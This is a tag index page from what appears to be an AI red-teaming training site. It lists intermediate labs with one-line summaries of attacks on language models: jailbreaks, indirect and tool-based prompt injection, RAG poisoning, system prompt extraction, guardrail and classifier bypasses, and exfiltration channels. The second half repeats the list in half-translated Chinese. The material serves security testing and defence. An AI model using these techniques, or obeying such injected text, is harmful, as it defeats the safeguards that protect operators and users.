# intermediate
310 articles tagged "intermediate"
Intermediate Certification Prep Guide
Comprehensive study guide for intermediate-level certification preparation.
Capstone: Compliance Assessment Simulation
Conduct a simulated compliance assessment against EU AI Act, NIST AI RMF, and ISO 42001, producing a comprehensive gap analysis report.
Capstone: Red Team Program Design
Design a complete AI red team program for a fictional enterprise, producing a comprehensive program charter document.
Capstone: Industry Vertical Deep Dive
Select an industry vertical, threat model the AI systems within it, and produce a sector-specific AI security testing guide.
LLM Guard and Protect AI Guardian
Input/output scanning, PII detection, toxicity filtering, integration patterns, and bypass techniques for LLM Guard and the Protect AI Guardian ecosystem.
NVIDIA NeMo Guardrails
Architecture, configuration, Colang programming, integration patterns, and bypass techniques for NVIDIA's open-source NeMo Guardrails framework.
AI Anomaly Detection
Detecting jailbreak attempts, unusual usage patterns, output drift, and embedding space anomalies in AI systems through statistical and ML-based methods.
AI Monitoring and Observability
What to monitor in AI systems, key metrics for detecting abuse and drift, alerting strategies, and observability architecture for LLM applications.
AI Logging Architecture
What to capture in AI system logs — prompts, completions, latency, tokens, tool calls — along with storage strategies, retention policies, and privacy considerations.
Adversarial ML: Core Concepts
History and fundamentals of adversarial machine learning — perturbation attacks, evasion vs poisoning, robustness — bridging classical adversarial ML to LLM-specific attacks.
AI Threat Models: White-box, Black-box & Grey-box
Access levels in AI security testing — what's possible at each level, realistic scenarios, and comparison to traditional security threat modeling.
Embeddings & Vector Spaces for Red Teamers
Understand how embeddings encode semantic meaning, how vector operations work, and why red teamers need to understand embedding spaces for RAG attacks and similarity exploitation.
Lab: Exploring Embedding Spaces
Hands-on lab using Python to visualize embedding spaces, measure semantic similarity, and demonstrate how adversarial documents can be crafted to match target queries.
RAG Architecture: How Retrieval Systems Work
End-to-end anatomy of a Retrieval-Augmented Generation pipeline — document ingestion, chunking, embedding, indexing, retrieval, context assembly, and generation — with attack surface analysis at each stage.
Semantic Similarity & Vector Search Attacks
How cosine similarity and nearest neighbor search work, and how attackers exploit vector databases through adversarial documents, embedding collisions, and threshold bypasses.
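The scoring at the heart of the entry above can be sketched in a few lines. This is a minimal illustration, not any particular vector database's implementation: toy 3-dimensional vectors stand in for real embeddings (which typically have hundreds to thousands of dimensions), and names like `adversarial_doc` are hypothetical.

```python
import math

def cosine_similarity(a, b):
    # dot(a, b) / (|a| * |b|) -- the core scoring function in vector search
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

def nearest_neighbors(query, docs, k=2):
    # Rank stored documents by similarity to the query vector, highest first.
    scored = sorted(docs.items(),
                    key=lambda kv: cosine_similarity(query, kv[1]),
                    reverse=True)
    return [name for name, _ in scored[:k]]

# Toy "embeddings": the adversarial document is crafted to sit very close
# to the same region of the space as the benign FAQ.
docs = {
    "benign_faq":      [0.9, 0.1, 0.0],
    "policy_doc":      [0.1, 0.9, 0.1],
    "adversarial_doc": [0.88, 0.12, 0.01],
}
query = [1.0, 0.0, 0.0]
print(nearest_neighbors(query, docs))
```

The attack intuition is visible even in this toy: a planted document that lands near a popular query region gets retrieved alongside (or instead of) the legitimate content.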
Inference: Sampling, Temperature & Generation
How LLMs generate text at inference time — greedy decoding, top-k, top-p, temperature — and how these parameters affect attack success rates.
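The parameters named above can be demonstrated on a toy logit vector. This is a schematic sketch of temperature scaling and nucleus (top-p) filtering, not any provider's actual sampler:

```python
import math

def softmax_with_temperature(logits, temperature=1.0):
    # Lower temperature sharpens the distribution; higher flattens it.
    scaled = [l / temperature for l in logits]
    m = max(scaled)
    exps = [math.exp(l - m) for l in scaled]
    total = sum(exps)
    return [e / total for e in exps]

def top_p_filter(probs, p=0.9):
    # Keep the smallest set of tokens whose cumulative probability reaches p,
    # then renormalize -- this is the candidate set in nucleus sampling.
    order = sorted(range(len(probs)), key=lambda i: probs[i], reverse=True)
    kept, cum = [], 0.0
    for i in order:
        kept.append(i)
        cum += probs[i]
        if cum >= p:
            break
    mass = sum(probs[i] for i in kept)
    return {i: probs[i] / mass for i in kept}

logits = [2.0, 1.0, 0.1, -1.0]
cold = softmax_with_temperature(logits, temperature=0.2)
hot = softmax_with_temperature(logits, temperature=2.0)
# At low temperature the top token dominates; at high temperature mass spreads.
print(max(cold), max(hot))
```

The red-team relevance: attack success rates measured at one temperature may not transfer, because higher temperatures widen the set of tokens the model can plausibly emit on any given turn.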
Tokenization & Its Security Implications
How BPE and SentencePiece tokenizers work, and how tokenizer behavior creates exploitable attack surfaces including boundary attacks, homoglyphs, and encoding tricks.
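One of the homoglyph issues mentioned above can be shown with nothing but the standard library: two strings that render identically are different code-point sequences, so they tokenize differently and slip past naive string comparisons.

```python
import unicodedata

def inspect_chars(text):
    # Report each character's official Unicode name -- visually identical
    # strings can mix scripts and therefore tokenize completely differently.
    return [(ch, unicodedata.name(ch, "UNKNOWN")) for ch in text]

latin = "admin"
mixed = "\u0430dmin"  # first letter is CYRILLIC SMALL LETTER A, not LATIN

print(latin == mixed)  # the strings differ despite identical rendering
print(inspect_chars(mixed[0]))
```

A filter keyed on the Latin spelling of a banned word never sees the mixed-script variant, while the model, trained on noisy multilingual text, often reads both the same way.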
Pre-training → Fine-tuning → RLHF Pipeline
Understand the three stages of creating an aligned LLM — pre-training, supervised fine-tuning, and RLHF/DPO — and the security implications at each stage.
Transformer Architecture for Attackers
Deep dive into the transformer architecture — attention, feed-forward layers, and residual connections — through the lens of which components are exploitable.
Agent Architectures & Tool Use Patterns
How ReAct, Plan-and-Execute, and LangGraph agent patterns work — tool definition, invocation, and result processing — and where injection happens in each architecture.
Common AI Deployment Patterns & Attack Surfaces
Analysis of deployment patterns — chatbots, copilots, autonomous agents, batch processing, and fine-tuned models — with their unique attack surfaces and security considerations.
Lab: Mapping an AI System's Attack Surface
Hands-on lab walking through reconnaissance of an AI system — identifying components, mapping data flows, enumerating tools, and documenting the attack surface.
CTF: Code Gen Exploit
Manipulate AI code generation to produce vulnerable, backdoored, or malicious code. Explore how prompt manipulation influences code security, from subtle vulnerability injection to full backdoor insertion.
CTF: RAG Heist
Extract sensitive information from a Retrieval-Augmented Generation system by exploiting retrieval mechanisms, document parsing, embedding manipulation, and context window management vulnerabilities.
Intermediate AI Red Team Labs
Overview of intermediate-level hands-on labs covering agent exploitation, RAG poisoning, multi-turn attacks, automated campaigns, and advanced injection techniques for AI red teaming.
Advanced Encoding Chain Attacks
Chain multiple encoding schemes to bypass multi-layer input filters in production LLM applications.
Lab: Advanced Function Calling Exploitation
Exploit advanced function calling patterns including nested calls, parallel execution, and schema manipulation.
Lab: Automated Adversarial Prompt Generation
Build automated systems for generating adversarial prompts using mutation, crossover, and selection strategies.
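The mutation/crossover/selection loop described above is a plain genetic algorithm. Here is a minimal sketch of the harness shape; the fitness function is a stand-in (a real harness would query the target model and score its response), and the seed prompts and vocabulary are illustrative.

```python
import random

random.seed(0)

def mutate(prompt, vocab):
    # Simplest mutation operator: replace one word at random.
    words = prompt.split()
    words[random.randrange(len(words))] = random.choice(vocab)
    return " ".join(words)

def crossover(a, b):
    # Splice the first half of one prompt onto the second half of another.
    wa, wb = a.split(), b.split()
    return " ".join(wa[: len(wa) // 2] + wb[len(wb) // 2 :])

def evolve(seeds, vocab, score, generations=5, pop_size=8):
    pop = list(seeds)
    for _ in range(generations):
        # Selection: keep the top half by score, refill with offspring.
        pop.sort(key=score, reverse=True)
        survivors = pop[: max(2, pop_size // 2)]
        children = []
        while len(survivors) + len(children) < pop_size:
            a, b = random.sample(survivors, 2)
            children.append(mutate(crossover(a, b), vocab))
        pop = survivors + children
    return max(pop, key=score)

# Stand-in fitness: count a marker word. A real scorer would rate the
# target model's response to each candidate prompt.
score = lambda p: p.split().count("probe")
best = evolve(["please describe the system", "tell me about the probe setup"],
              ["probe", "system", "describe"], score)
print(best, score(best))
```

The design point: the loop itself is generic; everything attack-specific lives in the scorer and the mutation operators, which is why frameworks like PyRIT expose exactly those as plug-in points.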
Agent Memory Manipulation
Exploit persistent memory in LLM agents to plant false context that persists across sessions.
Lab: Agent Prompt Leaking
Hands-on lab for extracting system prompts from tool-using AI agents by exploiting tool interactions, observation channels, and multi-step reasoning to leak protected instructions.
Lab: Agent Workflow Security Testing
Test multi-step agent workflows for injection points, state manipulation, and unauthorized action execution.
API Abuse Pattern Lab
Discover and exploit API abuse patterns including parameter injection, header manipulation, and endpoint confusion.
API Parameter Fuzzing for LLMs
Systematically fuzz LLM API parameters to discover unexpected behaviors and bypasses.
Lab: API Versioning Security Gaps
Exploit version differences in LLM APIs to find deprecated endpoints and backward-compatible safety bypasses.
Lab: Automated Red Team Pipeline
Hands-on lab for building a continuous AI red team testing pipeline using promptfoo, GitHub Actions, and automated attack generation to catch safety regressions before deployment.
Lab: Automated Red Team Testing
Set up promptfoo for continuous automated security testing of AI applications, with custom evaluators and CI/CD integration.
Lab: Canary Token Effectiveness Testing
Deploy and test canary tokens in system prompts to evaluate their effectiveness at detecting prompt extraction.
Lab: Chain-of-Thought Exploitation
Exploit chain-of-thought reasoning to leak internal model reasoning, bypass safety filters, and manipulate decision processes.
Lab: CI/CD Pipeline Security for LLM Apps
Test CI/CD pipeline security for LLM applications including prompt template injection, model artifact tampering, and deployment attacks.
Lab: Advanced Classifier Evasion
Evade advanced input classifiers using adversarial perturbation, semantic paraphrasing, and gradient-free optimization.
ML Classifier Evasion Lab
Develop payloads that evade machine learning-based input classifiers through adversarial text perturbation.
Lab: Cloud AI Platform Security Testing
Test cloud AI platform configurations including AWS Bedrock guardrails, Azure content filters, and GCP safety settings.
Lab: Code Generation Security Testing
Test LLM code generation for insecure patterns, injection vulnerabilities, and code execution safety issues.
Lab: AI Compliance Testing Fundamentals
Test LLM applications against OWASP LLM Top 10 and NIST AI RMF requirements using structured test procedures.
Lab: Context Window Attack Optimization
Optimize prompt injection placement within the context window to maximize attack effectiveness using attention dynamics.
Context Window Poisoning Lab
Exploit context window management to inject persistent adversarial content that influences future model responses.
Conversation Splitting Attack Lab
Split adversarial payloads across multiple conversation turns to bypass per-message safety classification.
Conversation State Poisoning
Exploit conversation history manipulation to alter model behavior across turns.
Cross-Context Injection
Inject prompts that persist across separate conversation contexts in shared deployments.
Custom Jailbreak Wordlist Generation
Generate targeted jailbreak wordlists using mutation strategies and seed prompts.
Lab: Data Exfiltration Channels
Hands-on lab for extracting data from AI systems through markdown image rendering, invisible links, tool call parameters, and other covert exfiltration channels.
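The markdown-image channel mentioned above has a recognizable shape on the defensive side: an image whose URL carries data in its query string. A minimal detection sketch, with hypothetical domain names:

```python
import re

# Flag markdown images whose URL has a query string -- the classic
# exfiltration shape is ![x](https://attacker.example/p.png?d=<secret>).
EXFIL_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+\?[^)\s]+)\)")

def find_suspect_images(llm_output):
    return EXFIL_IMAGE.findall(llm_output)

clean = "Here is a chart: ![chart](https://cdn.example.com/chart.png)"
leaky = "![x](https://attacker.test/pixel.png?d=c2VjcmV0)"
print(find_suspect_images(clean))  # no query string, nothing flagged
print(find_suspect_images(leaky))
```

A regex like this is a tripwire, not a defense: the stronger mitigation is to render no externally sourced images at all from model output.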
Lab: Data Exfiltration Channels (Intermediate Lab)
Extract sensitive information from AI systems through various exfiltration channels including crafted links, image tags, tool calls, and side-channel leakage.
Data Exfiltration via Side Channels
Extract data from LLM systems using timing, token probability, and formatting side channels.
Building Defense Bypass Chains
Combine multiple bypass techniques into reliable chains that defeat layered defenses.
Lab: Defense Effectiveness Measurement
Hands-on lab for quantifying AI guardrail robustness using attack success rates, evasion metrics, false positive rates, and statistical analysis of defense performance.
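The two headline metrics named above reduce to simple counting over labeled campaign results. A minimal sketch (the campaign data is hypothetical):

```python
def defense_metrics(results):
    # results: list of (is_attack, was_blocked) pairs from a test campaign.
    attacks = [r for r in results if r[0]]
    benign = [r for r in results if not r[0]]
    # Attack success rate: attacks that got through despite the defense.
    asr = sum(1 for _, blocked in attacks if not blocked) / len(attacks)
    # False positive rate: benign traffic wrongly blocked.
    fpr = sum(1 for _, blocked in benign if blocked) / len(benign)
    return {"attack_success_rate": asr, "false_positive_rate": fpr}

# Hypothetical run: 4 attack prompts (3 blocked), 4 benign prompts (1 blocked).
campaign = [(True, True), (True, True), (True, True), (True, False),
            (False, False), (False, False), (False, False), (False, True)]
print(defense_metrics(campaign))
```

Reporting both numbers together is the point: a guardrail tuned to drive ASR to zero usually pays for it in false positives, and that trade-off is what the assessment should surface.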
Lab: Defense Regression Testing Setup
Build a regression testing framework to continuously verify that LLM defenses remain effective against known attack patterns.
Lab: Defense Effectiveness Testing
Systematically test and measure the robustness of AI guardrails using structured methodology, metrics, and repeatable test suites.
Document-Based RAG Injection Lab
Inject adversarial content into documents that will be processed by a RAG system to influence model responses.
Lab: Advanced Embedding Manipulation
Manipulate embedding vectors to achieve target similarity scores for RAG poisoning and retrieval manipulation.
Practical Embedding Manipulation
Manipulate text to achieve target embedding similarities for poisoning retrieval augmented generation systems.
Embedding Similarity Attacks
Manipulate text to achieve target embedding similarity scores for retrieval poisoning.
Lab: Encoding Bypass Lab
Hands-on lab for systematically testing Base64, ROT13, Unicode homoglyph, hexadecimal, and combined encoding bypasses against LLM safety filters with measured success rates.
Fine-Tuning API Security Probing
Probe fine-tuning APIs for security weaknesses including insufficient validation and unsafe default configurations.
Lab: Fine-Tuning Safety Impact Testing
Measure how fine-tuning affects model safety by comparing safety benchmark scores before and after fine-tuning.
Lab: Guardrail Bypass Technique Laboratory
Practice guardrail bypass techniques against NeMo Guardrails, LLM Guard, and custom classifier-based defenses.
Guardrail Fingerprinting
Systematically map the rules and thresholds of input/output guardrail systems.
Guardrail Rule Extraction Lab
Systematically extract the rules and decision boundaries of guardrail systems through targeted probing.
Lab: Exploiting LLM Hallucinations
Exploit hallucination tendencies to trigger fabricated tool calls, invented API endpoints, and false fact injection.
Lab: AI Incident Response Simulation
Practice AI incident response procedures through a simulated prompt injection incident with escalation and containment.
Lab: Indirect Prompt Injection
Inject instructions through external data sources including documents, web pages, and emails that a target AI system processes as context.
Indirect Injection via Web Content
Plant prompt injection payloads in web pages consumed by RAG-enabled LLM applications.
Lab: Instruction Following Measurement
Quantitatively measure instruction following compliance to identify where models prioritize competing instructions.
LLM Judge Manipulation
Craft responses that exploit LLM-as-judge evaluation patterns to achieve high safety scores while embedding harmful content.
Lab: Log Probability Analysis for Attacks
Use token log probabilities to extract information about training data, system prompts, and model internals.
Lab: Advanced MCP Protocol Testing
Perform advanced security testing of MCP servers including transport analysis, capability enumeration, and tool poisoning.
MCP Tool Poisoning Attack
Exploit MCP tool descriptions to inject instructions that redirect agent behavior.
Lab: Model Context Protocol Fuzzing
Fuzz MCP protocol messages to discover parsing errors, validation gaps, and unexpected behavior in MCP servers.
Practical Model Fingerprinting Lab
Fingerprint the underlying model behind an API endpoint to identify its type, version, and configuration.
Lab: LLM Security Monitoring Setup
Deploy a comprehensive security monitoring system for LLM applications with anomaly detection and alerting.
Lab: Multi-Agent Communication Testing
Test security of inter-agent communication in multi-agent systems including message injection and trust boundary violations.
Multi-Language Safety Bypass Lab
Exploit gaps in safety training coverage across languages to bypass safety mechanisms using code-switching.
Multi-Language Injection Attacks
Exploit language switching and low-resource language gaps to bypass safety training.
Multi-Model Attack Chaining
Chain attacks across multiple LLM models in a pipeline to bypass per-model defenses.
Lab: Multi-Model Comparison Security Testing
Compare security postures across multiple LLM providers by running identical attack suites and analyzing differential responses.
Multi-Model Pipeline Attack Lab
Attack a pipeline where multiple models process data sequentially, exploiting trust between pipeline stages.
Lab: Multi-Turn State Tracking Attacks
Exploit conversation state tracking to build persistent attack context across multiple conversation turns.
Lab: Multimodal Injection
Hands-on lab for embedding text instructions in images to exploit vision-enabled LLMs. Learn to craft visual prompt injections, test OCR-based attacks, and evaluate multimodal safety boundaries.
Lab: Multimodal Injection (Intermediate Lab)
Embed prompt injection instructions in images for vision-enabled models, testing how visual content can carry adversarial payloads.
Lab: Intermediate Multimodal Security Testing
Test multimodal LLMs with crafted images containing embedded text, adversarial perturbations, and visual injection payloads.
Output Channel Discovery Lab
Discover alternative output channels in LLM applications that bypass standard output filtering.
Lab: Output Schema Exploitation
Exploit structured output schemas to force models into revealing information through required field population.
Lab: Prompt Caching Side-Channel Attacks
Exploit prompt caching mechanisms to detect cached prompts and extract information through timing side channels.
Prompt Leakage Technique Lab
Practice multiple system prompt extraction techniques and measure their effectiveness across different targets.
Automated Red Teaming with PyRIT
Use Microsoft's PyRIT framework to run automated multi-turn attack campaigns.
Lab: Advanced RAG Security Testing
Test RAG systems for chunking exploitation, reranking manipulation, and cross-document injection attacks.
RAG Context Poisoning
Poison a vector database to inject adversarial content into RAG retrieval results.
Reasoning Chain Hijacking
Hijack the model's chain-of-thought reasoning to redirect its conclusions toward attacker-controlled objectives.
Lab: Role Hierarchy Exploitation
Exploit multi-role LLM architectures by manipulating the instruction hierarchy between system, user, and assistant roles.
Lab: Safety Filter Benchmarking
Benchmark safety filters across providers using standardized test suites to compare detection rates and false positives.
Semantic Deception Crafting Lab
Craft semantically coherent prompts that conceal adversarial intent from both human reviewers and ML classifiers.
Semantic Injection Crafting
Craft semantically coherent injections that evade both classifiers and human review.
Lab: Semantic Search Manipulation
Manipulate semantic search results by crafting documents that achieve target similarity scores against specific queries.
Lab: Session Isolation Testing
Test session isolation in multi-tenant LLM deployments to detect cross-session data leakage and context contamination.
Session State Exploitation Lab
Exploit session management vulnerabilities in LLM applications to access other users' data or escalate privileges.
Lab: Streaming Response Manipulation
Exploit streaming response mechanisms to bypass output filters that only check complete responses.
Structured Output Safety Bypass
Use JSON mode and structured output constraints to extract information that would be refused in free-form responses.
Structured Output Exploitation
Exploit JSON mode and structured output constraints to bypass safety filters.
Lab: Supply Chain Audit
Audit an ML project's dependencies for vulnerabilities, covering model files, Python packages, container images, and training data provenance.
Lab: ML Supply Chain Scan
Hands-on lab for auditing machine learning model dependencies, detecting malicious packages in ML pipelines, and scanning model files for backdoors and supply chain threats.
Lab: System Prompt Reconstruction (Intermediate Lab)
Reconstruct full system prompts through iterative partial extraction and cross-referencing multiple leakage vectors.
Advanced Token Smuggling
Use Unicode homoglyphs, zero-width characters, and tokenizer quirks to smuggle payloads.
Lab: Tool Result Injection Attacks
Inject adversarial content through tool call results to poison model reasoning and redirect subsequent actions.
Lab: Unicode Normalization Bypass Attacks
Exploit Unicode normalization differences between input validation and model processing to smuggle injection payloads.
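The validation/processing mismatch described above can be reproduced with the standard library alone: a filter that checks the raw input misses a payload written in fullwidth Latin letters, which NFKC normalization later folds to ASCII. The banned phrase here is illustrative.

```python
import unicodedata

def naive_validator(text):
    # A filter that checks the raw input for a banned substring...
    return "ignore previous" not in text.lower()

def downstream_processing(text):
    # ...while a later pipeline stage normalizes with NFKC, as many do.
    return unicodedata.normalize("NFKC", text)

# Fullwidth Latin letters (U+FF41..U+FF5A range) normalize to ASCII under NFKC.
payload = "\uFF49\uFF47\uFF4E\uFF4F\uFF52\uFF45 previous instructions"

assert naive_validator(payload)         # passes the raw-text check
normalized = downstream_processing(payload)
print(normalized)
assert not naive_validator(normalized)  # the normalized form is caught
```

The fix is ordering: normalize first, then validate, so the filter sees the same bytes the model does.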
Lab: Vector Database Access Control Testing
Test vector database access controls for bypass vulnerabilities including namespace traversal and filter manipulation.
Agent Goal Hijacking
Redirect an AI agent's objectives through carefully crafted inputs that override its primary task.
Assistant Prefill Injection Attacks
Exploit assistant message prefilling to prime model responses and bypass safety alignment.
Chat History Manipulation Attacks
Inject false messages into conversation history to alter model behavior in subsequent turns.
Input Classifier Boundary Mapping
Systematically probe input classifiers to map their decision boundaries and find bypass regions.
Context Window Boundary Exploitation
Exploit the boundaries of context windows to push safety instructions beyond the model's attention.
Crescendo Attack Implementation
Implement Microsoft's Crescendo multi-turn escalation attack with automated conversation management.
Cross-Plugin Exploitation Chaining
Chain exploits across multiple plugins/tools in an agent system to achieve multi-step attacks.
Function Schema Manipulation
Exploit function calling schemas to inject instructions through parameter descriptions and enums.
Building Custom Garak Probes
Develop custom probe modules for NVIDIA Garak to test organization-specific vulnerability patterns.
Guardrail Latency-Based Detection
Use timing side channels to identify and characterize guardrail implementations in LLM applications.
Custom Inspect AI Safety Evaluations
Build custom safety evaluation tasks in Inspect AI to test application-specific vulnerability classes.
JailbreakBench Comparative Testing
Run standardized jailbreak benchmarks across multiple models and compare vulnerability profiles.
JSON Mode Safety Bypass
Exploit structured JSON output modes to bypass safety filters that only check plain-text responses.
LLM Guard Evasion Techniques
Develop evasion techniques against LLM Guard input scanners and output detectors.
Implementing Many-Shot Jailbreaking
Implement Anthropic's many-shot jailbreaking technique with scaling analysis across conversation lengths.
MCP Resource Data Exfiltration (Intermediate Lab)
Exploit MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.
Multi-Language Safety Gap Exploitation
Systematically identify and exploit safety training gaps across low-resource languages.
Multi-Turn State Tracking Exploitation
Exploit state management in multi-turn conversations to gradually shift model behavior over many turns.
NeMo Guardrails Bypass Techniques
Test and bypass NVIDIA NeMo Guardrails configurations using known evasion techniques.
Output Filter Bypass via Encoding
Bypass output safety filters by instructing the model to encode responses in Base64, hex, or custom schemes.
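Why this bypass works is easy to show from the defender's side: a literal-substring output filter never sees the banned string inside a Base64 blob. The sketch below contrasts a naive filter with one that tries to decode candidate blobs first; the banned marker is hypothetical.

```python
import base64
import re

BANNED = "internal-api-key"

def naive_output_filter(text):
    # Checks only the literal text of the response.
    return BANNED not in text

def decoding_aware_filter(text):
    # Additionally tries to Base64-decode long alphanumeric runs.
    if BANNED in text:
        return False
    for blob in re.findall(r"[A-Za-z0-9+/=]{16,}", text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except Exception:
            continue  # not valid Base64; ignore
        if BANNED in decoded:
            return False
    return True

encoded = base64.b64encode(b"the internal-api-key is 1234").decode()
response = f"Sure, here it is: {encoded}"
print(naive_output_filter(response))    # the naive filter misses it
print(decoding_aware_filter(response))  # decoding exposes the string
```

Decoding-aware filtering is itself an arms race (nested encodings, custom schemes), which is why this family of bypasses keeps working against filters that only canonicalize one layer deep.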
PDF Document Injection for RAG Systems
Craft adversarial PDF documents that inject instructions when processed by RAG document loaders.
Prompt Template Variable Injection
Inject adversarial content through template variable expansion in prompt management systems.
PyRIT Custom Attack Strategies
Build custom attack strategies and converters in Microsoft's PyRIT framework for targeted campaigns.
RAG Document Injection Campaign
Design and execute a document injection campaign against a RAG-powered application with vector search.
Semantic Search Poisoning
Craft adversarial documents that rank highly in semantic search for targeted queries in RAG systems.
Streaming Response Exfiltration
Exploit streaming API responses to exfiltrate data that might be caught by batch output filters.
System Prompt Extraction via Token Probabilities
Exploit token probability APIs to reconstruct hidden system prompts character by character.
Token Boundary Manipulation
Exploit tokenizer-specific behavior by crafting inputs that split across token boundaries in unexpected ways.
Tool Result Injection Attacks
Craft malicious tool return values that inject instructions back into the model's reasoning chain.
Injecting Text via Images to VLMs
Embed adversarial text in images that vision-language models read and follow as instructions.
Lab: Data Exfiltration via Webhooks
Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.
Simulation: Startup AI Assessment
Red team a startup's AI-powered product with limited scope and budget, making pragmatic tradeoffs between thoroughness and time constraints.
Code Injection via Markdown
Injecting executable payloads through markdown rendering in LLM outputs, exploiting the gap between text generation and content rendering in web-based LLM interfaces.
Context Window Stuffing
Techniques for filling the LLM context window to push system instructions out of active memory, manipulating token budgets to dilute or displace defensive prompts.
Delimiter Escape Attacks
Techniques for escaping delimiters used to separate system and user content in LLM applications, breaking out of sandboxed input regions to inject instructions.
Encoding-Based Evasion
Using base64, ROT13, hexadecimal, Unicode, and other encoding schemes to evade input detection systems and bypass content filters in LLM applications.
Few-Shot Injection
Using crafted few-shot examples within user input to steer LLM behavior toward unintended outputs, exploiting in-context learning to override safety training.
Payload Obfuscation Techniques
Methods for disguising prompt injection payloads through encoding, splitting, substitution, and other obfuscation techniques to bypass input filters and detection systems.
Role-Play Injection
Using fictional scenarios, character role-play, and narrative framing to bypass LLM safety filters by having the model operate within a permissive fictional context.
Translation Injection
Using translation requests and low-resource languages to bypass content filters, exploiting the uneven distribution of safety training across languages.
Virtual Persona Creation
Creating persistent alternate personas within LLM conversations to bypass safety training, establishing character identities that override the model's default behavioral constraints.
中階 Certification Prep 指南
Comprehensive study guide for intermediate-level certification preparation.
Capstone: Compliance 評量 Simulation
Conduct a simulated compliance assessment against EU AI Act, NIST AI RMF, and ISO 42001, producing a comprehensive gap analysis report.
Capstone: 紅隊 Program Design
Design a complete AI red team program for a fictional enterprise, producing a comprehensive program charter document.
Capstone: Industry Vertical Deep Dive
Select an industry vertical, threat model the AI systems within it, and produce a sector-specific AI security testing guide.
LLM Guard and Protect AI Guardian
Input/output scanning, PII detection, toxicity filtering, integration patterns, and bypass techniques for LLM Guard and the Protect AI Guardian ecosystem.
NVIDIA NeMo Guardrails
NVIDIA 之開源 NeMo Guardrails 框架之架構、組態、Colang 程式設計、整合模式與繞過技術。
AI Anomaly Detection
Detecting jailbreak attempts, unusual usage patterns, output drift, and embedding space anomalies in AI systems through statistical and ML-based methods.
AI 監控與可觀測性
於 AI 系統監控什麼、為偵測濫用與漂移之關鍵指標、警報策略,與 LLM 應用之可觀測性架構。
AI Logging Architecture
What to capture in AI system logs — prompts, completions, latency, tokens, tool calls — along with storage strategies, retention policies, and privacy considerations.
對抗式 ML:核心概念
對抗式機器學習的歷史與基本原理——擾動攻擊、逃避與投毒、穩健性——將古典對抗式 ML 銜接至 LLM 特有攻擊。
AI Threat 模型s: White-box, Black-box & Grey-box
Access levels in AI security testing — what's possible at each level, realistic scenarios, and comparison to traditional security threat modeling.
給紅隊員的嵌入向量與向量空間
理解嵌入向量如何編碼語意意義、向量運算如何運作,以及為何紅隊員需要理解嵌入空間以進行 RAG 攻擊與相似性利用。
實作:探索 Embedding 空間
使用 Python 視覺化 embedding 空間、量測語意相似度,並展示如何打造與目標查詢匹配之對抗文件之實作。
RAG 架構:檢索系統如何運作
檢索增強生成管線之端到端解剖——文件攝入、分塊、embedding、索引、檢索、脈絡組裝與生成——含各階段之攻擊面分析。
語意相似度與向量搜尋攻擊
Cosine 相似度與最近鄰搜尋之運作方式,以及攻擊者如何經由對抗文件、embedding 碰撞與門檻繞過利用向量資料庫。
推論:取樣、Temperature 與生成
LLM 如何在推論期生成文字——greedy decoding、top-k、top-p、temperature——以及這些參數如何影響攻擊成功率。
Tokenization & Its 安全 Implications
How BPE and SentencePiece tokenizers work, and how tokenizer behavior creates exploitable attack surfaces including boundary attacks, homoglyphs, and encoding tricks.
預訓練 → 微調 → RLHF 管線
瞭解打造對齊 LLM 的三階段流程——預訓練、監督式微調、RLHF/DPO——以及各階段的安全意涵。
Transformer Architecture for 攻擊ers
Deep dive into the transformer architecture — attention, feed-forward layers, and residual connections — through the lens of which components are exploitable.
代理架構與工具使用模式
ReAct、Plan-and-Execute 與 LangGraph 代理模式如何運作——工具定義、呼叫與結果處理——以及注入於每個架構中發生之處。
常見 AI 部署模式與攻擊面
部署模式之分析——聊天機器人、copilot、自主代理、批次處理與微調模型——及其獨特之攻擊面與安全考量。
實作:繪製 AI 系統的攻擊面
對 AI 系統進行偵察的實作課程——辨識元件、繪製資料流、枚舉工具,並撰寫攻擊面文件。
CTF:程式碼生成攻擊
操弄 AI 程式碼生成使其產出有漏洞、含後門或惡意的程式碼。從細微的漏洞注入到完整後門植入,探索提示操弄如何影響程式碼安全。
CTF:RAG 劫案
透過利用檢索機制、文件解析、嵌入操弄與上下文視窗管理漏洞,從檢索增強生成(RAG)系統中擷取敏感資訊。
中階 AI 紅隊實驗室
構成專業 AI 紅隊演練骨幹的核心攻擊技術實驗室——防禦繞過、代理利用、RAG 投毒與更多。
進階 Encoding Chain 攻擊s
Chain multiple encoding schemes to bypass multi-layer input filters in production LLM applications.
實驗室: 進階 Function Calling 利用ation
利用 advanced function calling patterns including nested calls, parallel execution, and schema manipulation.
實驗室: Automated Adversarial Prompt Generation
Build automated systems for generating adversarial prompts using mutation, crossover, and selection strategies.
代理 記憶體 Manipulation
利用 persistent memory in LLM agents to plant false context that persists across sessions.
實驗室: 代理 Prompt Leaking
Hands-on lab for extracting system prompts from tool-using AI agents by exploiting tool interactions, observation channels, and multi-step reasoning to leak protected instructions.
實驗室: 代理 Workflow 安全 Testing
Test multi-step agent workflows for injection points, state manipulation, and unauthorized action execution.
API Abuse Pattern 實驗室
Discover and exploit API abuse patterns including parameter injection, header manipulation, and endpoint confusion.
API Parameter Fuzzing for LLMs
Systematically fuzz LLM API parameters to discover unexpected behaviors and bypasses.
實驗室: API Versioning 安全 Gaps
利用 version differences in LLM APIs to find deprecated endpoints and backward-compatible safety bypasses.
實驗室: Automated 紅隊 Pipeline
Hands-on lab for building a continuous AI red team testing pipeline using promptfoo, GitHub Actions, and automated attack generation to catch safety regressions before deployment.
實驗室: Automated 紅隊 Testing
Set up promptfoo for continuous automated security testing of AI applications, with custom evaluators and CI/CD integration.
實驗室: Canary Token Effectiveness Testing
Deploy and test canary tokens in system prompts to evaluate their effectiveness at detecting prompt extraction.
實驗室: Chain-of-Thought 利用ation
利用 chain-of-thought reasoning to leak internal model reasoning, bypass safety filters, and manipulate decision processes.
實驗室: CI/CD Pipeline 安全 for LLM Apps
Test CI/CD pipeline security for LLM applications including prompt template injection, model artifact tampering, and deployment attacks.
實驗室: 進階 Classifier Evasion
Evade advanced input classifiers using adversarial perturbation, semantic paraphrasing, and gradient-free optimization.
ML Classifier Evasion 實驗室
Develop payloads that evade machine learning-based input classifiers through adversarial text perturbation.
實驗室: Cloud AI Platform 安全 Testing
